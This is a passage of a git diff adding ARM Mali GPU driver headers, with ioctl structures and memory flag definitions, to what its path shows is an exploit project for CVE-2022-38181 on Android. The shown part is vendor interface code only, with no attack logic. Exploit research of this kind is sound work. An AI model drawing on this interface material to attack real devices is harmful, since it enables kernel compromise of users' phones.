+ */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. 
+ */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input 
parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. 
+ * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define 
KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h new file mode 100644 index 0000000..b1cf438 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h @@ -0,0 +1,1216 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include <linux/types.h> + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected).
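+ * + * Illustrative sketch (assumed usage, not text from the original header): a + * just-in-time request that opts into the used-size heap info would set + * flags = BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE in its base_jit_alloc_info and + * point heap_info_gpu_addr at GPU-visible memory holding a __u32 used size + * in bytes.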
+ */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + 